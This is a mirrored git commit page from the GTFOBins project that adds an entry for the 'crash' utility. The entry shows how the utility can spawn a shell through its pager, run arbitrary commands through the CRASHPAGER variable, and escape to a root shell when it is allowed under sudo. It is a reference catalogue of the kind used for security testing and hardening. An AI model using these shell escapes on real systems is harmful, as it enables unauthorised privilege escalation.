mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Create crash.md
This commit is contained in:
parent
2e6fa047e9
commit
bbb7db7d63
17
_gtfobins/crash.md
Normal file
17
_gtfobins/crash.md
Normal file
@ -0,0 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
code: |
|
||||
crash -h
|
||||
!sh
|
||||
command:
|
||||
- code: |
|
||||
COMMAND='/usr/bin/id'
|
||||
CRASHPAGER="$COMMAND" crash -h
|
||||
sudo:
|
||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
code: |
|
||||
sudo crash -h
|
||||
!sh
|
||||
---
|
Loading…
Reference in New Issue
Block a user